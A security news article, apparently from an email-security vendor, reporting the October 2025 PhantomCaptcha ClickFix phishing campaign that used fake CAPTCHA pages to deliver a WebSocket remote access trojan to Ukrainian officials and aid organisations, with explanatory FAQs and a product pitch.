PhantomCaptcha ClickFix attack targets Ukraine war relief organizations

A sophisticated one-day phishing campaign impersonated official Ukrainian channels to deliver spyware targeting humanitarian aid groups.

What happened

According to BleepingComputer, on October 8, 2025, a short but highly targeted phishing campaign aimed at members of Ukraine’s regional government and major humanitarian organizations such as the International Committee of the Red Cross and UNICEF. The operation, dubbed PhantomCaptcha, was designed to deploy a WebSocket-based Remote Access Trojan (RAT) through a novel ClickFix attack technique.

Sent via spear phishing emails spoofing the Ukrainian President’s Office, the attack used fake PDF invites that linked to a counterfeit Zoom domain. The attack infrastructure had been quietly built over months, with domains registered as early as March.

Going deeper

Once the link was clicked, victims were shown a fake browser verification page and, if their unique client ID matched, were redirected to a legitimate, password-protected Zoom meeting, likely to facilitate a live social engineering attempt.

If the client ID did not match, victims were served a fake Cloudflare CAPTCHA page in Ukrainian. They were instructed to copy a “verification token” into the Windows Command Prompt, unwittingly running a PowerShell command that downloaded a reconnaissance script.

The script gathered local system data and delivered a second-stage WebSocket RAT capable of executing remote commands and exfiltrating data using base64-encoded JSON. The campaign's infrastructure leveraged Russian hosting services, and researchers also observed follow-up spyware operations targeting Android users in Ukraine.

While SentinelOne stopped short of confirming attribution, Google’s Threat Intelligence Group recently linked similar “I am not a robot” CAPTCHA lures to ColdRiver, a Russian intelligence-affiliated threat group.

What was said

Researchers reported that the attackers showed a high level of preparation, registering domains months ahead of the attack and developing realistic lures. They noted that the use of live Zoom calls and localized language greatly increased the social engineering credibility of the campaign.

Google’s Threat Intelligence Group confirmed a broader trend of evolving “CAPTCHA-based” lures and attributed similar operations to ColdRiver, also known as Star Blizzard or Callisto, which is believed to be connected to Russia’s FSB.

The big picture

The PhantomCaptcha campaign shows how phishing threats are growing more personal and interactive. Attackers carefully mirrored trusted communication styles, used native language prompts, and even integrated fake Zoom redirects to make the experience believable. The campaign’s reliance on human action, requiring victims to manually execute commands, demonstrates how modern phishing has evolved beyond relying solely on malicious links or attachments to instead focus on convincing users to compromise their own security.

Paubox recommends Inbound Email Security to intercept these highly deceptive messages before they reach employees. Its generative AI evaluates tone, intent, and sender behavior to expose subtle inconsistencies that slip past rule-based filters, helping organizations prevent phishing emails that exploit trust rather than technology.

FAQs

What is a ClickFix attack, and how does it differ from typical phishing?

ClickFix attacks rely on tricking users into manually copying and pasting commands into their terminals, bypassing browser-based defenses and increasing the chances of payload delivery.

Why would a threat actor use a fake Zoom meeting as part of the attack?

A legitimate Zoom redirect creates a sense of trust and may enable attackers to interact with victims live, heightening the success of social engineering or gathering additional context.

What is a WebSocket RAT, and how is it used in attacks like this?

A WebSocket RAT (Remote Access Trojan) uses persistent browser-server connections to send commands and receive stolen data, often in formats harder to detect, such as base64-encoded JSON.

How are Android users being targeted in connection with this campaign?

Follow-up campaigns deployed malicious APKs disguised as adult content or cloud storage tools to harvest data like location, images, and call logs from mobile devices.

What’s the broader risk for aid organizations in conflict zones?

Organizations working in active war regions are likely targets for cyberespionage due to their access to politically and operationally sensitive data, making digital security as necessary as physical safety.